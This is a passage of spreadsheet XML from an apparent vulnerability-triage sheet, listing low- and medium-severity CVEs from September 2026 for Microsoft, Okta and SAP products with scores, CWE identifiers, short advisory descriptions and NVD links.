      <c r="M476" s="5" t="inlineStr"/>
      <c r="N476" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O476" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P476" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q476" s="5" t="inlineStr"/>
      <c r="R476" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S476" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t>
        </is>
      </c>
    </row>
    <row r="477">
      <c r="A477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B477" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78560</t>
        </is>
      </c>
      <c r="D477" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E477" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F477" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G477" s="5" t="inlineStr"/>
      <c r="H477" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I477" s="5" t="inlineStr"/>
      <c r="J477" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K477" s="5" t="inlineStr"/>
      <c r="L477" s="5" t="inlineStr"/>
      <c r="M477" s="5" t="inlineStr"/>
      <c r="N477" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O477" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P477" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q477" s="5" t="inlineStr"/>
      <c r="R477" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S477" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway includes an optional pass-through authentication source that accepts user identity from a client-supplied HTTP header without cryptographic validation. In architectures where this optional source is enabled without an upstream reverse proxy or firewall configured to sanitize and enforce client headers, an unauthenticated user can supply an arbitrary identity value to initiate a session.</t>
        </is>
      </c>
      <c r="T477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t>
        </is>
      </c>
    </row>
    <row r="478">
      <c r="A478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B478" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68849</t>
        </is>
      </c>
      <c r="D478" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E478" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F478" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G478" s="5" t="inlineStr"/>
      <c r="H478" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I478" s="5" t="inlineStr"/>
      <c r="J478" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K478" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L478" s="5" t="inlineStr"/>
      <c r="M478" s="5" t="inlineStr"/>
      <c r="N478" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O478" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P478" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q478" s="5" t="inlineStr"/>
      <c r="R478" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S478" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t>
        </is>
      </c>
    </row>
    <row r="479">
      <c r="A479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B479" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69316</t>
        </is>
      </c>
      <c r="D479" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E479" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F479" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G479" s="5" t="inlineStr"/>
      <c r="H479" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I479" s="5" t="inlineStr"/>
      <c r="J479" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K47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79" s="5" t="inlineStr"/>
      <c r="M479" s="5" t="inlineStr"/>
      <c r="N479" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O479" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P479" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q479" s="5" t="inlineStr"/>
      <c r="R479" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S479" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69316</t>
        </is>
      </c>
    </row>
    <row r="480">
      <c r="A480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B480" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69832</t>
        </is>
      </c>
      <c r="D480" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E480" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G480" s="5" t="inlineStr"/>
      <c r="H480" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I480" s="5" t="inlineStr"/>
      <c r="J480" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K48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0" s="5" t="inlineStr"/>
      <c r="M480" s="5" t="inlineStr"/>
      <c r="N480" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O480" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P480" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q480" s="5" t="inlineStr"/>
      <c r="R480" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S480" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t>
        </is>
      </c>
    </row>
    <row r="481">
      <c r="A481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B481" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69853</t>
        </is>
      </c>
      <c r="D481" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E481" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F481" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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1" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S481" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69895</t>
        </is>
      </c>
      <c r="D482" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E482" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F482" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K48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2" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S482" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69548</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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3" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S483" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76959</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S484" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78452</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K485"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L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S485" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78508</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K48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6" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S486" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73019</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K48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87" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>CWE-41</t>
        </is>
      </c>
      <c r="S487" s="5" t="inlineStr">
        <is>
          <t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76962</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S488" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA (Manage Bank Chains app) does not perform sufficient authorization checks within certain affected functionality. An attacker with low privileges could send specially crafted requests to delete specific entries that should not be accessible to them. This results in a low impact on availability. There is no impact on confidentiality and integrity.</t>
        </is>
      </c>
      <c r="T488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76963</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S489" s="5" t="inlineStr">
        <is>
          <t>Due to a missing authorization check in Application Server ABAP of SAP NetWeaver and ABAP Platform, an authenticated attacker could gain unauthorized access to sensitive system configuration information. Successful exploitation could result in exposure of security relevant settings and internal system details, resulting in low impact on confidentiality while integrity and availability remain unaffected.</t>
        </is>
      </c>
      <c r="T489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76977</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="S490" s="5" t="inlineStr">
        <is>
          <t>SAP UI5 does not sufficiently validate the parent frame's origin against the configured allowlist. An unauthenticated attacker could host a malicious page to bypass framing restrictions. If an authenticated victim visits the attacker's page and interacts with it, the attacker could trick the victim into performing unintended actions, resulting in a low impact on integrity. There is no impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="T490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78455</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K49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L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S491" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78516</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K49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L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S492" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69904</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="n">
        <v>0.006</v>
      </c>
